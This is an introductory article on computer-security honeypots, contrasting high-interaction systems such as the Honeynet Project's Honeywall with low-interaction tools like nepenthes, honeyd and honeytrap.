The first appearances of honeypots in computer science are possibly in "The Cuckoo's Egg" by Clifford Stoll and in An Evening with Berferd by Bill Cheswick. In the former fake military reports were used as bait for the attackers. The latter is more recognisable as the sort of honeypot we know today, where an attacker is monitored and diverted away from production systems. In this paper we give a brief overview of what is available and highlight some of the key differences between today's honeypots.

Are honeypots high maintenance?

A major difference between types of honeypots is described in the ability of an attacker to interact with the application or service. Truly vulnerable systems allow for an attacker to interact with the system on all levels. The bad guys can probe, attack, and compromise it and upon successful exploitation use it as a tool for further attacks. These systems are therefore called high interaction honeypots, such as the Honeynet Project's 3rd Generation Honeywall ('roo') framework.

These require a lot of close monitoring and detailed analysis to see what the attacker is up to. We might expect these honeypots to be used to monitor an attacker who is trying to break in by guessing an SSH username and password. It is not, in general, possible to provide an emulation of a UNIX shell that will convince an attacker for long, and so a high interaction system is preferred. This is also likely to be what many people think of as a typical honeypot system; a vulnerable system with additional instrumentation to help the owner in monitoring.

Theoretically, any vulnerable machine can act as a high interaction honeypot. Connect it to the network and soon you will observe the first attacks. However, on such a system, it would be very difficult to perform a full forensic analysis on and this is why the honeywall, which sits between the honeynet and the outside world, is often used. It collects data from the network, the attacker's keystrokes and logs it all in a central repository for forensic analysis at a later time. Key-logging is done so that the attacker cannot conceal their actions by using an encrypted protocol like SSH.

The second type, the low interaction honeypots generally emulate vulnerabilities rather than presenting real vulnerable systems and therefore the attacker is not able to interact with it on all levels. For this reason, they are safer, in that you do not have to worry about the actions of the attacker on the system, but are considerably less flexible. An example of a (relatively) low interaction honeypot is nepenthes which will automatically collect samples of Windows-based worms with minimal user intervention. Nepenthes is a fantastic tool for collecting malware samples, but doesn't provide a complete simulation of a Windows host. Another program, honeyd allows the user to create a simulated network of over 60,000 hosts which can appear to be running different operating systems and services.

The honeypot tool honeytrap is designed to capture unknown attacks. It does this by listening on all TCP ports and dynamically loading handlers for each port. For example, nepenthes can capture unknown attacks against an existing service, such as microsoft-ds on 445/tcp but it will not deal with a connection attempt to a previously unknown port. Honeytrap has simple handlers which will record information about the TCP session, replay previously captured responses, download remote files when given (T)FTP commands, or it can proxy connections to another program.